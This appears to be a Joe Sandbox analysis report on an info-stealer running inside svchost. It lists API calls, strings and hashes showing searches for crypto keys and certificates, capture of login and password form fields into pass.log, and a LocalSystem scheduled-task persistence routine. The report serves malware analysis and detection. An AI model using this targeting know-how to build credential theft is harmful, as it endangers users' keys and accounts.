lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002), ref: 02D405D2
Sleep.KERNEL32(000003E8,?,?,02D6A56C,00000002), ref: 02D405F7
memset.MSVCRT ref: 02D4063A
lstrcpynA.KERNEL32(?,pubkeys.key,00000104), ref: 02D40654
Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002), ref: 02D40679
GetProcessHeap.KERNEL32(00000000,?,?), ref: 02D406B0
HeapValidate.KERNEL32(00000000), ref: 02D406B3
GetProcessHeap.KERNEL32(00000000,?), ref: 02D406C0
HeapFree.KERNEL32(00000000), ref: 02D406C3
CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?), ref: 02D406D2
Sleep.KERNEL32(000003E8), ref: 02D406E3
ReleaseMutex.KERNEL32(00000000), ref: 02D406EA
GetHandleInformation.KERNEL32 ref: 02D406FE
CloseHandle.KERNEL32(00000000), ref: 02D40710
GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002), ref: 02D4073D
HeapValidate.KERNEL32(00000000), ref: 02D40740
GetProcessHeap.KERNEL32(00000000,?), ref: 02D4074D
HeapFree.KERNEL32(00000000), ref: 02D40750
GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002), ref: 02D40759
HeapValidate.KERNEL32(00000000), ref: 02D4075C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D4076D
HeapFree.KERNEL32(00000000), ref: 02D40770

Strings

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}, xrefs: 02D406C9
secret.key, xrefs: 02D40568, 02D40579, 02D405C5
pubkeys.key, xrefs: 02D40647, 02D40658
keys.zip, xrefs: 02D404CA
5e8dc15b, xrefs: 02D40362, 02D4036D, 02D40450, 02D4045B
path.txt, xrefs: 02D403E8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$HandleProcess$ErrorFileLastPathmemset$CloseCreateDirectoryFreeInformationSleepValidatelstrcpyn$AdminAttributesBackslashFolderMakeMutexSystemUser$CurrentDeleteReleaseUnmapView
String ID: 5e8dc15b$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$keys.zip$path.txt$pubkeys.key$secret.key
API String ID: 3271848171-2456033755
Opcode ID: 275d9a68dba7a5b808ed7f555cc0834044c8364158bc3526c78a6834702a6075
Instruction ID: 0177a2fc2f4533052ea6f7126e1eceee0c4e33245d5d3de58812be32f1fc85ea
Opcode Fuzzy Hash: 275d9a68dba7a5b808ed7f555cc0834044c8364158bc3526c78a6834702a6075
Instruction Fuzzy Hash: 10C1F070944341AFD724DB60A89DFAB7BE8EF85705F548918E68687380EF74CC48CBA1

Function 02D306A0 Relevance: 75.6, APIs: 40, Strings: 3, Instructions: 311memorynetworkCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02D306E1
HeapAlloc.KERNEL32(00000000), ref: 02D306E4
memset.MSVCRT ref: 02D306FE
InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02D3071E
GetProcessHeap.KERNEL32(00000008,?), ref: 02D3073F
HeapAlloc.KERNEL32(00000000), ref: 02D30742
memset.MSVCRT ref: 02D30757
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D3076D
InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02D30789
InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02D3079C
GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D307AC
HeapAlloc.KERNEL32(00000000), ref: 02D307AF
memset.MSVCRT ref: 02D307CA
InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02D307DD
GetProcessHeap.KERNEL32(00000008,?), ref: 02D30829
HeapAlloc.KERNEL32(00000000), ref: 02D3082C
memset.MSVCRT ref: 02D30840
memset.MSVCRT ref: 02D30850
memcpy.MSVCRT ref: 02D3085E
_snprintf.MSVCRT ref: 02D308A0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D308CC
HeapValidate.KERNEL32(00000000), ref: 02D308CF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D308DC
HeapFree.KERNEL32(00000000), ref: 02D308DF
GetProcessHeap.KERNEL32(00000000,?), ref: 02D308EB
HeapValidate.KERNEL32(00000000), ref: 02D308EE
GetProcessHeap.KERNEL32(00000000,?), ref: 02D308FB
HeapFree.KERNEL32(00000000), ref: 02D308FE
GetProcessHeap.KERNEL32(00000000,?), ref: 02D30914
HeapValidate.KERNEL32(00000000), ref: 02D30917
GetProcessHeap.KERNEL32(00000000,?), ref: 02D30924
HeapFree.KERNEL32(00000000), ref: 02D30927
GetProcessHeap.KERNEL32(00000000,?,?), ref: 02D30946
HeapValidate.KERNEL32(00000000), ref: 02D3094F
GetProcessHeap.KERNEL32(00000000,?), ref: 02D30958
HeapFree.KERNEL32(00000000), ref: 02D3095B
GetProcessHeap.KERNEL32(00000000,?), ref: 02D30967
HeapValidate.KERNEL32(00000000), ref: 02D3096A
GetProcessHeap.KERNEL32(00000000,?), ref: 02D30973
HeapFree.KERNEL32(00000000), ref: 02D30976

Strings

}}}, xrefs: 02D308B8
[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s, xrefs: 02D30899
UserAgent, xrefs: 02D3087D, 02D30889

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
API String ID: 1808236364-2343086565
Opcode ID: 0e0621ed03828e7a45cdae49fd96c696e1669c1e68a1777e239503ef4e073fb4
Instruction ID: 571a30d91c2f5cef33d4933f176ac749a7a9d2bddaef800de870488e75fe9f11
Opcode Fuzzy Hash: 0e0621ed03828e7a45cdae49fd96c696e1669c1e68a1777e239503ef4e073fb4
Instruction Fuzzy Hash: 71A19C71940209ABEB129BA8EC49FAFBBA8EF89755F144145F904A7380DB709D51CBF0

Function 02D3DAC0 Relevance: 68.4, APIs: 25, Strings: 14, Instructions: 184threadCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(?,self.cer,00000000,00000000,00000000,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DAFA
StrStrIA.SHLWAPI(?,\crypto\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DB08
StrStrIA.SHLWAPI(00000001,02D66228,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DB15
StrStrIA.SHLWAPI(?,\micros~\crypto\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DB87
StrStrIA.SHLWAPI(?,\maxthon3\public\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DB97
StrStrIA.SHLWAPI(?,\microsoft\crypto\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBA7
StrStrIA.SHLWAPI(?,\crypto pro\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBB7
StrStrIA.SHLWAPI(?,\progra~1\crypto~1\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBC7
StrStrIA.SHLWAPI(?,\temporary internet files\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBD7
StrStrIA.SHLWAPI(?,:\users\public,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBE7
StrStrIA.SHLWAPI(?,02D6A214,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBF7
StrStrIA.SHLWAPI(00000000,02D66228,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DC03
StrStrIA.SHLWAPI(?,\cryptokit\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DC13
StrStrIA.SHLWAPI(?,:\progra~1\common~1\crypto~1,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DC1F
CreateThread.KERNEL32(00000000,00000000,02D3C350,?,00000000,00000000), ref: 02D3DC42

Strings

self.cer, xrefs: 02D3DAF4
\progra~1\crypto~1\, xrefs: 02D3DBC1
\microsoft\crypto\, xrefs: 02D3DBA1
\micros~\crypto\, xrefs: 02D3DB81
:\progra~1\common~1\crypto~1, xrefs: 02D3DC19
\maxthon3\public\, xrefs: 02D3DB91
\temporary internet files\, xrefs: 02D3DBD1
\crypto pro\, xrefs: 02D3DBB1
\crypto\, xrefs: 02D3DB02
\public\, xrefs: 02D3DB59, 02D3DB71
crypto, xrefs: 02D3DB2E
\private\, xrefs: 02D3DB4C, 02D3DB65
:\users\public, xrefs: 02D3DBE1
\cryptokit\, xrefs: 02D3DC0D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: :\progra~1\common~1\crypto~1$:\users\public$\crypto pro\$\crypto\$\cryptokit\$\maxthon3\public\$\microsoft\crypto\$\micros~\crypto\$\private\$\progra~1\crypto~1\$\public\$\temporary internet files\$crypto$self.cer
API String ID: 2422867632-4225811205
Opcode ID: eac7ba4fe8b74de145ed1f5bb3875417292ab32f692453dfc3741bebfd1997c4
Instruction ID: cf7a94a8ea8000cd498806f6b4a3d45294b92227087d1095fd0477e6af854ebd
Opcode Fuzzy Hash: eac7ba4fe8b74de145ed1f5bb3875417292ab32f692453dfc3741bebfd1997c4
Instruction Fuzzy Hash: 1E4164B16A131676B7125A35ED8DF7B1F9E8A489D87141412F847F2309FBB8CC4AC9B0

Function 004033B0 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004033FE
memset.MSVCRT ref: 0040341E
memset.MSVCRT ref: 0040343E
IsUserAnAdmin.SHELL32 ref: 00403446
GetVersionExA.KERNEL32 ref: 00403461

Part of subcall function 00403310: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
Part of subcall function 00403310: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
Part of subcall function 00403310: OpenProcessToken.ADVAPI32(00000000), ref: 00403360
Part of subcall function 00403310: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
Part of subcall function 00403310: CloseHandle.KERNEL32(00000000), ref: 00403397

GetTickCount.KERNEL32 ref: 004034A5
_snwprintf.MSVCRT ref: 004034BE
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040351B
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 00403567
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040356E
memset.MSVCRT ref: 00403586
_snwprintf.MSVCRT ref: 004035A0
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE

Strings

<Actions , xrefs: 0040365A
<Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 004033C4
p=<u, xrefs: 0040379B
\\?\globalroot\systemroot\system32\tasks\, xrefs: 004033E7
00-->, xrefs: 0040368F
task%d, xrefs: 004034AC

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=<u$task%d
API String ID: 1601901853-1711019342
Opcode ID: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
Instruction ID: 1b369b621c6b50f993c5cfef2b03b24b37f74764d04c33fe2e8d64a6d5fdefe9
Opcode Fuzzy Hash: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
Instruction Fuzzy Hash: F8D1C3B1504301ABD720DF64CC49B5B7BE8EFC8715F048A29FA49A72D1E774EA04CB99

Function 02D38A60 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 244memorystringthreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,74DEF570,?,?), ref: 02D38A83
HeapAlloc.KERNEL32(00000000), ref: 02D38A8A
memset.MSVCRT ref: 02D38A9E
IsBadReadPtr.KERNEL32(?,?), ref: 02D38ABB
memcpy.MSVCRT ref: 02D38ACC
strstr.MSVCRT ref: 02D38ADD
strstr.MSVCRT ref: 02D38AF0
PathAddBackslashA.SHLWAPI(5E8DC3C1), ref: 02D38B1D
PathAppendA.SHLWAPI(?,5E8DC3C1), ref: 02D38B2B
PathAddBackslashA.SHLWAPI(5E8DC3C1), ref: 02D38B36
strstr.MSVCRT ref: 02D38B98
strstr.MSVCRT ref: 02D38BAB
PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D38BDD
PathAppendA.SHLWAPI(?,5E8DC473), ref: 02D38BEB
PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D38BF6
CreateThread.KERNEL32(00000000,00000000,02D421E0,00000000,00000000,00000000), ref: 02D38C51
strstr.MSVCRT ref: 02D38C70
strstr.MSVCRT ref: 02D38C83
PathAddBackslashA.SHLWAPI(02D7D098), ref: 02D38CAF
PathAppendA.SHLWAPI(?,02D7D098), ref: 02D38CBD
PathAddBackslashA.SHLWAPI(02D7D098), ref: 02D38CC8
CreateThread.KERNEL32(00000000,00000000,02D43910,00000000,00000000,00000000), ref: 02D38D23
GetHandleInformation.KERNEL32(00000000,?), ref: 02D38D3B
CloseHandle.KERNEL32(00000000), ref: 02D38D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D38D5B
HeapValidate.KERNEL32(00000000), ref: 02D38D5E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D38D6B
HeapFree.KERNEL32(00000000), ref: 02D38D6E

Strings

name_, xrefs: 02D38B92
&ctl00%24MainMenu%24Login1%24UserName=, xrefs: 02D38C6A
&ctl00%24MainMenu%24Login1%24Password=, xrefs: 02D38C7D
5E8DC3C1, xrefs: 02D38B18, 02D38B1F, 02D38B31, 02D38B38
pass.log, xrefs: 02D38B58, 02D38C18, 02D38CEA
login=, xrefs: 02D38AD7
5E8DC473, xrefs: 02D38BD8, 02D38BDF, 02D38BF1, 02D38BF8
password=, xrefs: 02D38AEA
pass_, xrefs: 02D38BA5

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashHeapstrstr$AppendProcess$CreateHandleThread$AllocCloseFreeInformationReadValidatememcpymemset
String ID: &ctl00%24MainMenu%24Login1%24Password=$&ctl00%24MainMenu%24Login1%24UserName=$5E8DC3C1$5E8DC473$login=$name_$pass.log$pass_$password=
API String ID: 3712039096-2536547967
Opcode ID: a08c1e3a03c573678740ee94f06e93491386f7c57590cc573a62cef3f4c68138
Instruction ID: 27c12d36f0bc539b1b2487ccb16322683e8b9345ae28c93cb549c9492eb43874
Opcode Fuzzy Hash: a08c1e3a03c573678740ee94f06e93491386f7c57590cc573a62cef3f4c68138
Instruction Fuzzy Hash: EC810830A402246BE7229B34EC59FDA3BA99F55B04F1844A5F985D7340EBB0ED48CBB1

Function 02D27E40 Relevance: 61.4, APIs: 32, Strings: 3, Instructions: 182memorysleepsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 02D27A00: IsUserAnAdmin.SHELL32 ref: 02D27A0A
Part of subcall function 02D27A00: memset.MSVCRT ref: 02D27A41
Part of subcall function 02D27A00: memset.MSVCRT ref: 02D27A59
Part of subcall function 02D27A00: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,74DEF380), ref: 02D27A7B
Part of subcall function 02D27A00: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,74DEF380), ref: 02D27AA1
Part of subcall function 02D27A00: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,74DEF380), ref: 02D27B2D
Part of subcall function 02D27A00: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,74DEF380), ref: 02D27B34

OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02D27E85
Sleep.KERNEL32(00000064), ref: 02D27E92
OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02D27EA4
ReleaseMutex.KERNEL32(00000000), ref: 02D27EAD
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D27EC5
CloseHandle.KERNEL32(00000000), ref: 02D27ED7
GetProcessHeap.KERNEL32(00000000,00000000,A1633C7Da,a1633cfca), ref: 02D27EE2
HeapValidate.KERNEL32(00000000), ref: 02D27EE5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27EF2
HeapFree.KERNEL32(00000000), ref: 02D27EF5
GetProcessHeap.KERNEL32(00000000,00000000,A1633C7Da,a1633cfca), ref: 02D27F02
HeapValidate.KERNEL32(00000000), ref: 02D27F05
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27F12
HeapFree.KERNEL32(00000000), ref: 02D27F15
SetCaretBlinkTime.USER32(000000FF), ref: 02D27F27
Sleep.KERNEL32(000001F4), ref: 02D27F55
StrToIntA.SHLWAPI(00000000,A1633C7Da,a1633cfca), ref: 02D27F85
GetProcessHeap.KERNEL32(00000000,00000000,A1633C7Da,a1633cfca), ref: 02D27F95
HeapValidate.KERNEL32(00000000), ref: 02D27F98
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27FA5
HeapFree.KERNEL32(00000000), ref: 02D27FA8
GetProcessHeap.KERNEL32(00000000,00000000,A1633C7Da,a1633cfca), ref: 02D27FB5
HeapValidate.KERNEL32(00000000), ref: 02D27FB8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27FC5
HeapFree.KERNEL32(00000000), ref: 02D27FC8
Sleep.KERNEL32(00001388,A1633C7Da,a1633cfca), ref: 02D27FD3
closesocket.WS2_32(?), ref: 02D28005
HeapFree.KERNEL32(00000000,00000000,?), ref: 02D28025
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02D2803D
ReleaseMutex.KERNEL32(00000000), ref: 02D2804F
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D28072
CloseHandle.KERNEL32(00000000), ref: 02D2808C

Strings

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}, xrefs: 02D27E7A, 02D27E98
A1633C7Da, xrefs: 02D27E5A, 02D27F6E
a1633cfca, xrefs: 02D27E50, 02D27F64

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
String ID: A1633C7Da$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$a1633cfca
API String ID: 2871222221-3250897629
Opcode ID: f9517c2dae9823d6faf4d673c128cca5446e3a120ca04128b265acdbf1d96499
Instruction ID: 283b17e2846d36599c0ddbf63a11638ca5871b55b10f72b95caf65ea06441ce4
Opcode Fuzzy Hash: f9517c2dae9823d6faf4d673c128cca5446e3a120ca04128b265acdbf1d96499
Instruction Fuzzy Hash: 68519031A88321ABE720AB70EC4DF6BB769AF55B59F544904F909863C0DB74CC58CAB1

Function 02D3C350 Relevance: 56.3, APIs: 25, Strings: 7, Instructions: 268fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D3C36F
PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C3A7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C3E7
GetLastError.KERNEL32 ref: 02D3C3F1
IsUserAnAdmin.SHELL32 ref: 02D3C3F9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C40A
SetLastError.KERNEL32(00000000), ref: 02D3C411
StrStrIA.SHLWAPI(?,crypto), ref: 02D3C423
StrStrIA.SHLWAPI(?,self.cer), ref: 02D3C436
StrStrIA.SHLWAPI(?,self.pub), ref: 02D3C447
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D3C492
DeleteFileA.KERNEL32(?), ref: 02D3C49F

Strings

5E8DC08D, xrefs: 02D3C3A2, 02D3C3AD, 02D3C502, 02D3C50D
self.cer, xrefs: 02D3C42B
keys.zip, xrefs: 02D3C54B
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02D3C5B4
crypto, xrefs: 02D3C41D
self.pub, xrefs: 02D3C43F
path.txt, xrefs: 02D3C46F

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
String ID: 5E8DC08D$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$crypto$keys.zip$path.txt$self.cer$self.pub
API String ID: 3980609930-1879590787
Opcode ID: 42ebc6c67f4dd1a5294142cfd671ad249b08ff7755e7f74fad56373381243497
Instruction ID: 7fb08d3de6c03de2d6ccab4185f6e265ba1616061a04c676ad5afee5f44db43c
Opcode Fuzzy Hash: 42ebc6c67f4dd1a5294142cfd671ad249b08ff7755e7f74fad56373381243497
Instruction Fuzzy Hash: F6913531D50219AFDB269B74E85CBEA3BA5AF49704F044496E889E7340DB70DD84CBB0

Function 02D440E0 Relevance: 54.5, APIs: 24, Strings: 7, Instructions: 221stringsynchronizationsleepCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 02D44123
strstr.MSVCRT ref: 02D44136
strstr.MSVCRT ref: 02D44149
PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D44177
PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D441AD
CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02D4420D
GetLastError.KERNEL32 ref: 02D44217
IsUserAnAdmin.SHELL32 ref: 02D4421F
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D44230
SetLastError.KERNEL32(00000000), ref: 02D44237
SetCurrentDirectoryA.KERNEL32(?), ref: 02D44244
strstr.MSVCRT ref: 02D44277
PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D442A7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D442E1
GetLastError.KERNEL32 ref: 02D442EB
IsUserAnAdmin.SHELL32 ref: 02D442F3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D44304
SetLastError.KERNEL32(00000000), ref: 02D4430B
SetCurrentDirectoryA.KERNEL32(?), ref: 02D44318
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02D4434E
Sleep.KERNEL32(000003E8), ref: 02D4435F
ReleaseMutex.KERNEL32(00000000), ref: 02D44366
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D44378
CloseHandle.KERNEL32(00000000), ref: 02D44389

Strings

IDToken1=, xrefs: 02D44130
pass2.txt, xrefs: 02D44331
login.yota.ru, xrefs: 02D4411D
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}, xrefs: 02D4433B
pass.txt, xrefs: 02D4425D
YotaConfirmForm%5Bpassword%5D, xrefs: 02D44271
IDToken2=, xrefs: 02D44143

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$DirectoryErrorLaststrstr$BackslashCreate$AdminCurrentFolderHandleMakeMutexSystemUser$CloseInformationReleaseSleep
String ID: IDToken1=$IDToken2=$Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$YotaConfirmForm%5Bpassword%5D$login.yota.ru$pass.txt$pass2.txt
API String ID: 1263884631-1052718204
Opcode ID: 5bf064b028154867ff6d078ff75b2e012a2fa49671475fd26b0207631954d72c
Instruction ID: 3668eff4636a9c882e6a7e47e8f897598b75b3c79f2f17a4a996c2618514f065
Opcode Fuzzy Hash: 5bf064b028154867ff6d078ff75b2e012a2fa49671475fd26b0207631954d72c
Instruction Fuzzy Hash: 23711131A402156BDB219B74B86CBFA7BA9AF51705F548554ECC6E7300EFA0DDC8CBA0

Function 02D32340 Relevance: 52.9, APIs: 23, Strings: 7, Instructions: 351fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?), ref: 02D3235C
PathAddBackslashA.SHLWAPI(?), ref: 02D32367
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,02D32B46,02D32B47), ref: 02D323C3
PathAddBackslashA.SHLWAPI(?), ref: 02D323CE
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 02D32423
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02D32447
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02D32461

Strings

) - , xrefs: 02D325D8
a1633ec9a, xrefs: 02D3236D
***************************, xrefs: 02D324B5
dd:MMM:yyyy, xrefs: 02D3257C
A1633E0Ba, xrefs: 02D323D4
***************************, xrefs: 02D3263D
HH:mm:ss, xrefs: 02D32518

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$File$BackslashCreateFolder$Pointer
String ID: ***************************$ ***************************$) - $A1633E0Ba$HH:mm:ss$a1633ec9a$dd:MMM:yyyy
API String ID: 1731142794-4284199273
Opcode ID: dea38a48d442f558fcb6c61dbe464aac63f0df5a53b9e20a612438fe0a26379f
Instruction ID: 2bc2b06251a7f646ef1a443c7f05ce788330cad634965e1b67f947e894ef95d9
Opcode Fuzzy Hash: dea38a48d442f558fcb6c61dbe464aac63f0df5a53b9e20a612438fe0a26379f
